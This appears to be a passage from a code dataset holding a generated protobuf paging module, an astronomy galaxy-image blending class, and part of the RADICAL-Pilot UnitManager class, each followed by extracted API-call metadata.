"(last_created, style='F')\n", (18954, 18979), False, 'from discord.utils import format_dt\n'), ((19051, 19084), 'discord.utils.format_dt', 'format_dt', (['last_update'], {'style': '"""F"""'}), "(last_update, style='F')\n", (19060, 19084), False, 'from discord.utils import format_dt\n'), ((10646, 10668), 'discord.Color.random', 'discord.Color.random', ([], {}), '()\n', (10666, 10668), False, 'import discord\n')] |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: crud/Paging.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name="crud/Paging.proto",
package="bluzelle.curium.crud",
syntax="proto3",
serialized_options=b"Z'github.com/bluzelle/curium/x/crud/types",
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\x11\x63rud/Paging.proto\x12\x14\x62luzelle.curium.crud"0\n\rPagingRequest\x12\x10\n\x08startKey\x18\x01 \x01(\t\x12\r\n\x05limit\x18\x02 \x01(\x04"0\n\x0ePagingResponse\x12\x0f\n\x07nextKey\x18\x01 \x01(\t\x12\r\n\x05total\x18\x02 \x01(\x04\x42)Z\'github.com/bluzelle/curium/x/crud/typesb\x06proto3',
)
_PAGINGREQUEST = _descriptor.Descriptor(
name="PagingRequest",
full_name="bluzelle.curium.crud.PagingRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name="startKey",
full_name="bluzelle.curium.crud.PagingRequest.startKey",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="limit",
full_name="bluzelle.curium.crud.PagingRequest.limit",
index=1,
number=2,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=43,
serialized_end=91,
)
_PAGINGRESPONSE = _descriptor.Descriptor(
name="PagingResponse",
full_name="bluzelle.curium.crud.PagingResponse",
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name="nextKey",
full_name="bluzelle.curium.crud.PagingResponse.nextKey",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="total",
full_name="bluzelle.curium.crud.PagingResponse.total",
index=1,
number=2,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=93,
serialized_end=141,
)
DESCRIPTOR.message_types_by_name["PagingRequest"] = _PAGINGREQUEST
DESCRIPTOR.message_types_by_name["PagingResponse"] = _PAGINGRESPONSE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
PagingRequest = _reflection.GeneratedProtocolMessageType(
"PagingRequest",
(_message.Message,),
{
"DESCRIPTOR": _PAGINGREQUEST,
"__module__": "crud.Paging_pb2"
# @@protoc_insertion_point(class_scope:bluzelle.curium.crud.PagingRequest)
},
)
_sym_db.RegisterMessage(PagingRequest)
PagingResponse = _reflection.GeneratedProtocolMessageType(
"PagingResponse",
(_message.Message,),
{
"DESCRIPTOR": _PAGINGRESPONSE,
"__module__": "crud.Paging_pb2"
# @@protoc_insertion_point(class_scope:bluzelle.curium.crud.PagingResponse)
},
)
_sym_db.RegisterMessage(PagingResponse)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| [
"google.protobuf.reflection.GeneratedProtocolMessageType",
"google.protobuf.symbol_database.Default",
"google.protobuf.descriptor.FieldDescriptor",
"google.protobuf.descriptor.FileDescriptor"
] | [((417, 443), 'google.protobuf.symbol_database.Default', '_symbol_database.Default', ([], {}), '()\n', (441, 443), True, 'from google.protobuf import symbol_database as _symbol_database\n'), ((459, 1006), 'google.protobuf.descriptor.FileDescriptor', '_descriptor.FileDescriptor', ([], {'name': '"""crud/Paging.proto"""', 'package': '"""bluzelle.curium.crud"""', 'syntax': '"""proto3"""', 'serialized_options': 'b"Z\'github.com/bluzelle/curium/x/crud/types"', 'create_key': '_descriptor._internal_create_key', 'serialized_pb': 'b\'\\n\\x11crud/Paging.proto\\x12\\x14bluzelle.curium.crud"0\\n\\rPagingRequest\\x12\\x10\\n\\x08startKey\\x18\\x01 \\x01(\\t\\x12\\r\\n\\x05limit\\x18\\x02 \\x01(\\x04"0\\n\\x0ePagingResponse\\x12\\x0f\\n\\x07nextKey\\x18\\x01 \\x01(\\t\\x12\\r\\n\\x05total\\x18\\x02 \\x01(\\x04B)Z\\\'github.com/bluzelle/curium/x/crud/typesb\\x06proto3\''}), '(name=\'crud/Paging.proto\', package=\n \'bluzelle.curium.crud\', syntax=\'proto3\', serialized_options=\n b"Z\'github.com/bluzelle/curium/x/crud/types", create_key=_descriptor.\n _internal_create_key, serialized_pb=\n b\'\\n\\x11crud/Paging.proto\\x12\\x14bluzelle.curium.crud"0\\n\\rPagingRequest\\x12\\x10\\n\\x08startKey\\x18\\x01 \\x01(\\t\\x12\\r\\n\\x05limit\\x18\\x02 \\x01(\\x04"0\\n\\x0ePagingResponse\\x12\\x0f\\n\\x07nextKey\\x18\\x01 \\x01(\\t\\x12\\r\\n\\x05total\\x18\\x02 \\x01(\\x04B)Z\\\'github.com/bluzelle/curium/x/crud/typesb\\x06proto3\'\n )\n', (485, 1006), True, 'from google.protobuf import descriptor as _descriptor\n'), ((4611, 4759), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', (['"""PagingRequest"""', '(_message.Message,)', "{'DESCRIPTOR': _PAGINGREQUEST, '__module__': 'crud.Paging_pb2'}"], {}), "('PagingRequest', (_message.Message\n ,), {'DESCRIPTOR': _PAGINGREQUEST, '__module__': 'crud.Paging_pb2'})\n", (4651, 4759), True, 'from google.protobuf import reflection as _reflection\n'), ((4932, 5087), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', (['"""PagingResponse"""', '(_message.Message,)', "{'DESCRIPTOR': _PAGINGRESPONSE, '__module__': 'crud.Paging_pb2'}"], {}), "('PagingResponse', (_message.\n Message,), {'DESCRIPTOR': _PAGINGRESPONSE, '__module__': 'crud.Paging_pb2'}\n )\n", (4972, 5087), True, 'from google.protobuf import reflection as _reflection\n'), ((1895, 2288), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', ([], {'name': '"""limit"""', 'full_name': '"""bluzelle.curium.crud.PagingRequest.limit"""', 'index': '(1)', 'number': '(2)', 'type': '(4)', 'cpp_type': '(4)', 'label': '(1)', 'has_default_value': '(False)', 'default_value': '(0)', 'message_type': 'None', 'enum_type': 'None', 'containing_type': 'None', 'is_extension': '(False)', 'extension_scope': 'None', 'serialized_options': 'None', 'file': 'DESCRIPTOR', 'create_key': '_descriptor._internal_create_key'}), "(name='limit', full_name=\n 'bluzelle.curium.crud.PagingRequest.limit', index=1, number=2, type=4,\n cpp_type=4, label=1, has_default_value=False, default_value=0,\n message_type=None, enum_type=None, containing_type=None, is_extension=\n False, extension_scope=None, serialized_options=None, file=DESCRIPTOR,\n create_key=_descriptor._internal_create_key)\n", (1922, 2288), True, 'from google.protobuf import descriptor as _descriptor\n'), ((3593, 3987), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', ([], {'name': '"""total"""', 'full_name': '"""bluzelle.curium.crud.PagingResponse.total"""', 'index': '(1)', 'number': '(2)', 'type': '(4)', 'cpp_type': '(4)', 'label': '(1)', 'has_default_value': '(False)', 'default_value': '(0)', 'message_type': 'None', 'enum_type': 'None', 'containing_type': 'None', 'is_extension': '(False)', 'extension_scope': 'None', 'serialized_options': 'None', 'file': 'DESCRIPTOR', 'create_key': '_descriptor._internal_create_key'}), "(name='total', full_name=\n 'bluzelle.curium.crud.PagingResponse.total', index=1, number=2, type=4,\n cpp_type=4, label=1, has_default_value=False, default_value=0,\n message_type=None, enum_type=None, containing_type=None, is_extension=\n False, extension_scope=None, serialized_options=None, file=DESCRIPTOR,\n create_key=_descriptor._internal_create_key)\n", (3620, 3987), True, 'from google.protobuf import descriptor as _descriptor\n')] |
# -*- coding: utf-8 -*-
""" BLEND
This module defines classes and methods for blending images.
:Author: <NAME> <<EMAIL>>
"""
import numpy as np
from lmfit import Model
from lmfit.models import GaussianModel, ConstantModel
from modopt.base.np_adjust import pad2d
from sf_tools.image.stamp import postage_stamp
from sf_tools.image.distort import recentre
class Blender(object):
def __init__(self, images, ratio=1.0, overlap=True, stamp_shape=(116, 116),
method='sf', xwang_sigma=0.15, seed=None):
self.ratio = ratio
self.overlap = overlap
self.stamp_shape = np.array(stamp_shape)
if method in ('sf', 'xwang'):
self.method = method
else:
raise ValueError('Method must be "sf" or "xwang".')
self.xwang_sigma = xwang_sigma
self.seed = seed
if images.shape[0] % 2:
images = images[:-1]
half_sample = images.shape[0] // 2
self._images = images
self._centrals = images[:half_sample]
self._companions = images[half_sample:]
self.obj_centres = []
@staticmethod
def _fit_gauss(xval, yval):
model = GaussianModel()
result = model.fit(yval, model.guess(yval, x=xval,
amplitude=np.max(yval)), x=xval)
return result
@classmethod
def _fit_image(cls, image):
sum_x = image.sum(axis=0)
sum_y = image.sum(axis=1)
x_vals = np.arange(sum_x.size)
sum_x_fit = cls._fit_gauss(x_vals, sum_x)
sum_y_fit = cls._fit_gauss(x_vals, sum_y)
centre = (int(sum_x_fit.params['center'].value),
int(sum_y_fit.params['center'].value))
width = min(sum_x_fit.params['fwhm'].value,
sum_y_fit.params['fwhm'].value)
return centre, width
@staticmethod
def _random_shift(radius, outer_radius=None, seed=None):
if seed:
np.random.seed(seed)
theta = np.random.ranf() * 2 * np.pi
if outer_radius:
r = radius + np.random.ranf() * (outer_radius - radius)
else:
r = np.random.ranf() * radius
x = int(np.around(r * np.cos(theta)))
y = int(np.around(r * np.sin(theta)))
return x, y
@staticmethod
def _pad_image_shift(image, shift):
pad = [(_shift, 0) if _shift >= 0 else (0, -_shift)
for _shift in shift]
return np.pad(image, pad, 'constant')
@classmethod
def _blend(cls, image1, image2, shift):
dim = image1.shape
image2 = cls._pad_image_shift(image2, shift)
image2 = image2[:dim[0]] if shift[0] >= 0 else image2[-shift[0]:]
image2 = image2[:, :dim[1]] if shift[1] >= 0 else image2[:, -shift[1]:]
return image1 + image2
@staticmethod
def _gal_size_xwang(image):
return np.array([np.count_nonzero(image.sum(axis=ax))
for ax in range(2)])
@staticmethod
def _area_prob(shape1, shape2):
shape1, shape2 = np.array(shape1), np.array(shape2)
area = np.prod(shape1) - np.prod(shape2)
shape_diff = (shape1 - shape2) // 2
prob_ab = shape_diff[1] * shape1[0] / area
prob_cd = 0.5 - prob_ab
return prob_ab, prob_ab, prob_cd, prob_cd
@classmethod
def _blend_pos_xwang(cls, centre, box, limits, overlap=True):
centre, box, limits = np.array(centre), np.array(box), np.array(limits)
if overlap:
blend_pos = [np.random.randint(centre[i] - box[i],
centre[i] + box[i]) for i in range(2)]
else:
sector = np.random.choice(['a', 'b', 'c', 'd'],
p=cls.area_prob(centre * 2, box))
blend_pos = [None, None]
if sector == 'a':
blend_pos[0] = np.random.randint(limits[0][0], limits[1][0])
blend_pos[1] = np.random.randint(limits[0][1],
centre[1] - box[1])
elif sector == 'b':
blend_pos[0] = np.random.randint(limits[0][0], limits[1][0])
blend_pos[1] = np.random.randint(centre[1] + box[1],
limits[1][1])
elif sector == 'c':
blend_pos[0] = np.random.randint(limits[0][0],
centre[0] - box[0])
blend_pos[1] = np.random.randint(centre[1] - box[1],
centre[1] + box[1])
elif sector == 'd':
blend_pos[0] = np.random.randint(centre[0] + box[0],
limits[1][1])
blend_pos[1] = np.random.randint(centre[1] - box[1],
centre[1] + box[1])
return blend_pos
@classmethod
def _blend_xwang(cls, image1, image2, ps_shape=(116, 116), sigma=0.15,
overlap=True):
shape1, shape2 = np.array(image1.shape), np.array(image2.shape)
rad2 = shape2 // 2
ps_shape = np.array(ps_shape)
shape_diff = (ps_shape - shape1) // 2 + shape2
dis = cls._gal_size_xwang(image1) + cls._gal_size_xwang(image2)
box = np.around(sigma * dis).astype(int)
padding = ((shape_diff[0], shape_diff[0]),
(shape_diff[1], shape_diff[1]))
new_image = np.pad(image1, padding, 'constant')
new_shape = np.array(new_image.shape)
new_centre = new_shape // 2
limits = rad2, new_shape - rad2
bp = cls._blend_pos_xwang(new_centre, box, limits, overlap=True)
blend_slice = [slice(bp[i] - shape2[i] // 2,
bp[i] + shape2[i] // 2 + 1) for i in range(2)]
new_image[blend_slice[0], blend_slice[1]] += image2
new_image = postage_stamp(new_image, pos=new_centre,
pixel_rad=ps_shape // 2)
return new_image
def _pad_image(self, image):
if not isinstance(image, np.ndarray):
print(type(image))
im_shape = np.array(image.shape)
padding = (self.stamp_shape - im_shape) // 2
return pad2d(image, padding)
def _combine_images(self, image1, image2):
if self.method == 'xwang':
res = self._blend_xwang(image1, image2, ps_shape=self.stamp_shape,
sigma=self.xwang_sigma,
overlap=self.overlap)
else:
centre1, width1 = self._fit_image(image1)
centre2, width2 = self._fit_image(image2)
image1 = self._pad_image(recentre(image1, centre1))
image2 = self._pad_image(recentre(image2, centre2))
radius = self.ratio * (width1 + width2)
outer_radius = image1.shape[0] / 2.
if self.overlap:
shift = self._random_shift(radius, seed=self.seed)
else:
shift = self._random_shift(radius, outer_radius=outer_radius,
seed=self.seed)
im1_cen = np.array(image1.shape) // 2
im2_cen = np.copy(im1_cen) + np.array(shift)[::-1]
self.obj_centres.append((tuple(im1_cen), tuple(im2_cen)))
res = self._blend(image1, image2, shift)
return res
def blend(self):
blends = [self._combine_images(image1, image2) for image1, image2 in
zip(self._centrals, self._companions)]
return np.array(blends)
def pad(self):
im1_cen = np.array(self._pad_image(self._images[0]).shape) // 2
res = []
for image in self._images:
res.append(self._pad_image(image))
self.obj_centres.append((tuple(im1_cen), (None, None)))
return np.array(res)
| [
"numpy.prod",
"numpy.copy",
"numpy.arange",
"modopt.base.np_adjust.pad2d",
"sf_tools.image.distort.recentre",
"numpy.sin",
"numpy.max",
"numpy.array",
"numpy.random.randint",
"lmfit.models.GaussianModel",
"numpy.random.seed",
"numpy.around",
"numpy.cos",
"numpy.random.ranf",
"numpy.pad",... | [((610, 631), 'numpy.array', 'np.array', (['stamp_shape'], {}), '(stamp_shape)\n', (618, 631), True, 'import numpy as np\n'), ((1178, 1193), 'lmfit.models.GaussianModel', 'GaussianModel', ([], {}), '()\n', (1191, 1193), False, 'from lmfit.models import GaussianModel, ConstantModel\n'), ((1472, 1493), 'numpy.arange', 'np.arange', (['sum_x.size'], {}), '(sum_x.size)\n', (1481, 1493), True, 'import numpy as np\n'), ((2455, 2485), 'numpy.pad', 'np.pad', (['image', 'pad', '"""constant"""'], {}), "(image, pad, 'constant')\n", (2461, 2485), True, 'import numpy as np\n'), ((5174, 5192), 'numpy.array', 'np.array', (['ps_shape'], {}), '(ps_shape)\n', (5182, 5192), True, 'import numpy as np\n'), ((5495, 5530), 'numpy.pad', 'np.pad', (['image1', 'padding', '"""constant"""'], {}), "(image1, padding, 'constant')\n", (5501, 5530), True, 'import numpy as np\n'), ((5551, 5576), 'numpy.array', 'np.array', (['new_image.shape'], {}), '(new_image.shape)\n', (5559, 5576), True, 'import numpy as np\n'), ((5934, 5999), 'sf_tools.image.stamp.postage_stamp', 'postage_stamp', (['new_image'], {'pos': 'new_centre', 'pixel_rad': '(ps_shape // 2)'}), '(new_image, pos=new_centre, pixel_rad=ps_shape // 2)\n', (5947, 5999), False, 'from sf_tools.image.stamp import postage_stamp\n'), ((6192, 6213), 'numpy.array', 'np.array', (['image.shape'], {}), '(image.shape)\n', (6200, 6213), True, 'import numpy as np\n'), ((6283, 6304), 'modopt.base.np_adjust.pad2d', 'pad2d', (['image', 'padding'], {}), '(image, padding)\n', (6288, 6304), False, 'from modopt.base.np_adjust import pad2d\n'), ((7625, 7641), 'numpy.array', 'np.array', (['blends'], {}), '(blends)\n', (7633, 7641), True, 'import numpy as np\n'), ((7920, 7933), 'numpy.array', 'np.array', (['res'], {}), '(res)\n', (7928, 7933), True, 'import numpy as np\n'), ((1954, 1974), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (1968, 1974), True, 'import numpy as np\n'), ((3057, 3073), 'numpy.array', 'np.array', (['shape1'], {}), '(shape1)\n', (3065, 3073), True, 'import numpy as np\n'), ((3075, 3091), 'numpy.array', 'np.array', (['shape2'], {}), '(shape2)\n', (3083, 3091), True, 'import numpy as np\n'), ((3108, 3123), 'numpy.prod', 'np.prod', (['shape1'], {}), '(shape1)\n', (3115, 3123), True, 'import numpy as np\n'), ((3126, 3141), 'numpy.prod', 'np.prod', (['shape2'], {}), '(shape2)\n', (3133, 3141), True, 'import numpy as np\n'), ((3435, 3451), 'numpy.array', 'np.array', (['centre'], {}), '(centre)\n', (3443, 3451), True, 'import numpy as np\n'), ((3453, 3466), 'numpy.array', 'np.array', (['box'], {}), '(box)\n', (3461, 3466), True, 'import numpy as np\n'), ((3468, 3484), 'numpy.array', 'np.array', (['limits'], {}), '(limits)\n', (3476, 3484), True, 'import numpy as np\n'), ((5081, 5103), 'numpy.array', 'np.array', (['image1.shape'], {}), '(image1.shape)\n', (5089, 5103), True, 'import numpy as np\n'), ((5105, 5127), 'numpy.array', 'np.array', (['image2.shape'], {}), '(image2.shape)\n', (5113, 5127), True, 'import numpy as np\n'), ((1992, 2008), 'numpy.random.ranf', 'np.random.ranf', ([], {}), '()\n', (2006, 2008), True, 'import numpy as np\n'), ((2144, 2160), 'numpy.random.ranf', 'np.random.ranf', ([], {}), '()\n', (2158, 2160), True, 'import numpy as np\n'), ((3531, 3588), 'numpy.random.randint', 'np.random.randint', (['(centre[i] - box[i])', '(centre[i] + box[i])'], {}), '(centre[i] - box[i], centre[i] + box[i])\n', (3548, 3588), True, 'import numpy as np\n'), ((3877, 3922), 'numpy.random.randint', 'np.random.randint', (['limits[0][0]', 'limits[1][0]'], {}), '(limits[0][0], limits[1][0])\n', (3894, 3922), True, 'import numpy as np\n'), ((3954, 4005), 'numpy.random.randint', 'np.random.randint', (['limits[0][1]', '(centre[1] - box[1])'], {}), '(limits[0][1], centre[1] - box[1])\n', (3971, 4005), True, 'import numpy as np\n'), ((5336, 5358), 'numpy.around', 'np.around', (['(sigma * dis)'], {}), '(sigma * dis)\n', (5345, 5358), True, 'import numpy as np\n'), ((6749, 6774), 'sf_tools.image.distort.recentre', 'recentre', (['image1', 'centre1'], {}), '(image1, centre1)\n', (6757, 6774), False, 'from sf_tools.image.distort import recentre\n'), ((6813, 6838), 'sf_tools.image.distort.recentre', 'recentre', (['image2', 'centre2'], {}), '(image2, centre2)\n', (6821, 6838), False, 'from sf_tools.image.distort import recentre\n'), ((7216, 7238), 'numpy.array', 'np.array', (['image1.shape'], {}), '(image1.shape)\n', (7224, 7238), True, 'import numpy as np\n'), ((7266, 7282), 'numpy.copy', 'np.copy', (['im1_cen'], {}), '(im1_cen)\n', (7273, 7282), True, 'import numpy as np\n'), ((1290, 1302), 'numpy.max', 'np.max', (['yval'], {}), '(yval)\n', (1296, 1302), True, 'import numpy as np\n'), ((2071, 2087), 'numpy.random.ranf', 'np.random.ranf', ([], {}), '()\n', (2085, 2087), True, 'import numpy as np\n'), ((2200, 2213), 'numpy.cos', 'np.cos', (['theta'], {}), '(theta)\n', (2206, 2213), True, 'import numpy as np\n'), ((2246, 2259), 'numpy.sin', 'np.sin', (['theta'], {}), '(theta)\n', (2252, 2259), True, 'import numpy as np\n'), ((4118, 4163), 'numpy.random.randint', 'np.random.randint', (['limits[0][0]', 'limits[1][0]'], {}), '(limits[0][0], limits[1][0])\n', (4135, 4163), True, 'import numpy as np\n'), ((4195, 4246), 'numpy.random.randint', 'np.random.randint', (['(centre[1] + box[1])', 'limits[1][1]'], {}), '(centre[1] + box[1], limits[1][1])\n', (4212, 4246), True, 'import numpy as np\n'), ((7285, 7300), 'numpy.array', 'np.array', (['shift'], {}), '(shift)\n', (7293, 7300), True, 'import numpy as np\n'), ((4359, 4410), 'numpy.random.randint', 'np.random.randint', (['limits[0][0]', '(centre[0] - box[0])'], {}), '(limits[0][0], centre[0] - box[0])\n', (4376, 4410), True, 'import numpy as np\n'), ((4491, 4548), 'numpy.random.randint', 'np.random.randint', (['(centre[1] - box[1])', '(centre[1] + box[1])'], {}), '(centre[1] - box[1], centre[1] + box[1])\n', (4508, 4548), True, 'import numpy as np\n'), ((4661, 4712), 'numpy.random.randint', 'np.random.randint', (['(centre[0] + box[0])', 'limits[1][1]'], {}), '(centre[0] + box[0], limits[1][1])\n', (4678, 4712), True, 'import numpy as np\n'), ((4793, 4850), 'numpy.random.randint', 'np.random.randint', (['(centre[1] - box[1])', '(centre[1] + box[1])'], {}), '(centre[1] - box[1], centre[1] + box[1])\n', (4810, 4850), True, 'import numpy as np\n')] |
__copyright__ = "Copyright 2013-2016, http://radical.rutgers.edu"
__license__ = "MIT"
import os
import time
import threading as mt
import radical.utils as ru
from . import utils as rpu
from . import states as rps
from . import constants as rpc
from . import compute_unit_description as rpcud
# bulk callbacks are implemented, but are currently not used nor exposed.
_USE_BULK_CB = False
if os.environ.get('RADICAL_PILOT_BULK_CB', '').lower() in ['true', 'yes', '1']:
_USE_BULK_CB = True
# ------------------------------------------------------------------------------
#
class UnitManager(rpu.Component):
"""
A UnitManager manages :class:`radical.pilot.ComputeUnit` instances which
represent the **executable** workload in RADICAL-Pilot. A UnitManager
connects the ComputeUnits with one or more :class:`Pilot` instances (which
represent the workload **executors** in RADICAL-Pilot) and a **scheduler**
which determines which :class:`ComputeUnit` gets executed on which
:class:`Pilot`.
**Example**::
s = rp.Session(database_url=DBURL)
pm = rp.PilotManager(session=s)
pd = rp.ComputePilotDescription()
pd.resource = "futuregrid.alamo"
pd.cores = 16
p1 = pm.submit_pilots(pd) # create first pilot with 16 cores
p2 = pm.submit_pilots(pd) # create second pilot with 16 cores
# Create a workload of 128 '/bin/sleep' compute units
compute_units = []
for unit_count in range(0, 128):
cu = rp.ComputeUnitDescription()
cu.executable = "/bin/sleep"
cu.arguments = ['60']
compute_units.append(cu)
# Combine the two pilots, the workload and a scheduler via
# a UnitManager.
um = rp.UnitManager(session=session, scheduler=rp.SCHEDULER_ROUND_ROBIN)
um.add_pilot(p1)
um.submit_units(compute_units)
The unit manager can issue notification on unit state changes. Whenever
state notification arrives, any callback registered for that notification is
fired.
NOTE: State notifications can arrive out of order wrt the unit state model!
"""
# --------------------------------------------------------------------------
#
def __init__(self, session, cfg='default', scheduler=None):
"""
Creates a new UnitManager and attaches it to the session.
**Arguments:**
* session [:class:`radical.pilot.Session`]:
The session instance to use.
* cfg (`dict` or `string`):
The configuration or name of configuration to use.
* scheduler (`string`):
The name of the scheduler plug-in to use.
**Returns:**
* A new `UnitManager` object [:class:`radical.pilot.UnitManager`].
"""
self._pilots = dict()
self._pilots_lock = ru.RLock('umgr.pilots_lock')
self._units = dict()
self._units_lock = ru.RLock('umgr.units_lock')
self._callbacks = dict()
self._cb_lock = ru.RLock('umgr.cb_lock')
self._terminate = mt.Event()
self._closed = False
self._rec_id = 0 # used for session recording
self._uid = ru.generate_id('umgr.%(item_counter)04d',
ru.ID_CUSTOM, ns=session.uid)
for m in rpc.UMGR_METRICS:
self._callbacks[m] = dict()
# NOTE: `name` and `cfg` are overloaded, the user cannot point to
# a predefined config and amed it at the same time. This might
# be ok for the session, but introduces a minor API inconsistency.
#
name = None
if isinstance(cfg, str):
name = cfg
cfg = None
cfg = ru.Config('radical.pilot.umgr', name=name, cfg=cfg)
cfg.uid = self._uid
cfg.owner = self._uid
cfg.sid = session.uid
cfg.base = session.base
cfg.path = session.path
cfg.dburl = session.dburl
cfg.heartbeat = session.cfg.heartbeat
if scheduler:
# overwrite the scheduler from the config file
cfg.scheduler = scheduler
rpu.Component.__init__(self, cfg, session=session)
self.start()
self._log.info('started umgr %s', self._uid)
self._rep.info('<<create unit manager')
# create pmgr bridges and components, use session cmgr for that
self._cmgr = rpu.ComponentManager(self._cfg)
self._cmgr.start_bridges()
self._cmgr.start_components()
# The output queue is used to forward submitted units to the
# scheduling component.
self.register_output(rps.UMGR_SCHEDULING_PENDING,
rpc.UMGR_SCHEDULING_QUEUE)
# the umgr will also collect units from the agent again, for output
# staging and finalization
if self._cfg.bridges.umgr_staging_output_queue:
self._has_sout = True
self.register_output(rps.UMGR_STAGING_OUTPUT_PENDING,
rpc.UMGR_STAGING_OUTPUT_QUEUE)
else:
self._has_sout = False
# register the state notification pull cb
# FIXME: this should be a tailing cursor in the update worker
self.register_timed_cb(self._state_pull_cb,
timer=self._cfg['db_poll_sleeptime'])
# register callback which pulls units back from agent
# FIXME: this should be a tailing cursor in the update worker
self.register_timed_cb(self._unit_pull_cb,
timer=self._cfg['db_poll_sleeptime'])
# also listen to the state pubsub for unit state changes
self.register_subscriber(rpc.STATE_PUBSUB, self._state_sub_cb)
# let session know we exist
self._session._register_umgr(self)
self._prof.prof('setup_done', uid=self._uid)
self._rep.ok('>>ok\n')
# --------------------------------------------------------------------------
#
def initialize(self):
# the manager must not carry bridge and component handles across forks
ru.atfork(self._atfork_prepare, self._atfork_parent, self._atfork_child)
# --------------------------------------------------------------------------
#
# EnTK forks, make sure we don't carry traces of children across the fork
#
def _atfork_prepare(self): pass
def _atfork_parent(self) : pass
def _atfork_child(self) :
self._bridges = dict()
self._components = dict()
# --------------------------------------------------------------------------
#
def finalize(self):
self._cmgr.close()
# --------------------------------------------------------------------------
#
def close(self):
"""
Shut down the UnitManager and all its components.
"""
# we do not cancel units at this point, in case any component or pilot
# wants to continue to progress unit states, which should indeed be
# independent from the umgr life cycle.
if self._closed:
return
self._terminate.set()
self._rep.info('<<close unit manager')
# disable callbacks during shutdown
with self._cb_lock:
self._callbacks = dict()
for m in rpc.UMGR_METRICS:
self._callbacks[m] = dict()
self._cmgr.close()
self._log.info("Closed UnitManager %s." % self._uid)
self._closed = True
self._rep.ok('>>ok\n')
# --------------------------------------------------------------------------
#
def as_dict(self):
"""
Returns a dictionary representation of the UnitManager object.
"""
ret = {
'uid': self.uid,
'cfg': self.cfg
}
return ret
# --------------------------------------------------------------------------
#
def __str__(self):
"""
Returns a string representation of the UnitManager object.
"""
return str(self.as_dict())
# --------------------------------------------------------------------------
#
def _pilot_state_cb(self, pilots, state=None):
if self._terminate.is_set():
return False
# we register this callback for pilots added to this umgr. It will
# specifically look out for pilots which complete, and will make sure
# that all units are pulled back into umgr control if that happens
# prematurely.
#
# If we find units which have not completed the agent part of the unit
# state model, we declare them FAILED. If they can be restarted, we
# resubmit an identical unit, which then will get a new unit ID. This
# avoids state model confusion (the state model is right now expected to
# be linear), but is not intuitive for the application (FIXME).
#
# FIXME: there is a race with the umgr scheduler which may, just now,
# and before being notified about the pilot's demise, send new
# units to the pilot.
# we only look into pilot states when the umgr is still active
# FIXME: note that there is a race in that the umgr can be closed while
# we are in the cb.
# FIXME: `self._closed` is not an `mt.Event`!
if self._closed:
self._log.debug('umgr closed, ignore pilot cb %s',
['%s:%s' % (p.uid, p.state) for p in pilots])
return True
if not isinstance(pilots, list):
pilots = [pilots]
for pilot in pilots:
state = pilot.state
if state in rps.FINAL:
self._log.debug('pilot %s is final - pull units', pilot.uid)
unit_cursor = self.session._dbs._c.find({
'type' : 'unit',
'pilot' : pilot.uid,
'umgr' : self.uid,
'control' : {'$in' : ['agent_pending', 'agent']}})
if not unit_cursor.count():
units = list()
else:
units = list(unit_cursor)
self._log.debug("units pulled: %3d (pilot dead)", len(units))
if not units:
continue
# update the units to avoid pulling them again next time.
# NOTE: this needs not locking with the unit pulling in the
# _unit_pull_cb, as that will only pull umgr_pending
# units.
uids = [unit['uid'] for unit in units]
self._session._dbs._c.update({'type' : 'unit',
'uid' : {'$in' : uids}},
{'$set' : {'control' : 'umgr'}},
multi=True)
to_restart = list()
for unit in units:
unit['state'] = rps.FAILED
if not unit['description'].get('restartable'):
self._log.debug('unit %s not restartable', unit['uid'])
continue
self._log.debug('unit %s is restartable', unit['uid'])
unit['restarted'] = True
ud = rpcud.ComputeUnitDescription(unit['description'])
to_restart.append(ud)
# FIXME: increment some restart counter in the description?
# FIXME: reference the resulting new uid in the old unit.
if to_restart and not self._closed:
self._log.debug('restart %s units', len(to_restart))
restarted = self.submit_units(to_restart)
for u in restarted:
self._log.debug('restart unit %s', u.uid)
# final units are not pushed
self.advance(units, publish=True, push=False)
# keep cb registered
return True
# --------------------------------------------------------------------------
#
def _state_pull_cb(self):
if self._terminate.is_set():
return False
# pull all unit states from the DB, and compare to the states we know
# about. If any state changed, update the unit instance and issue
# notification callbacks as needed. Do not advance the state (again).
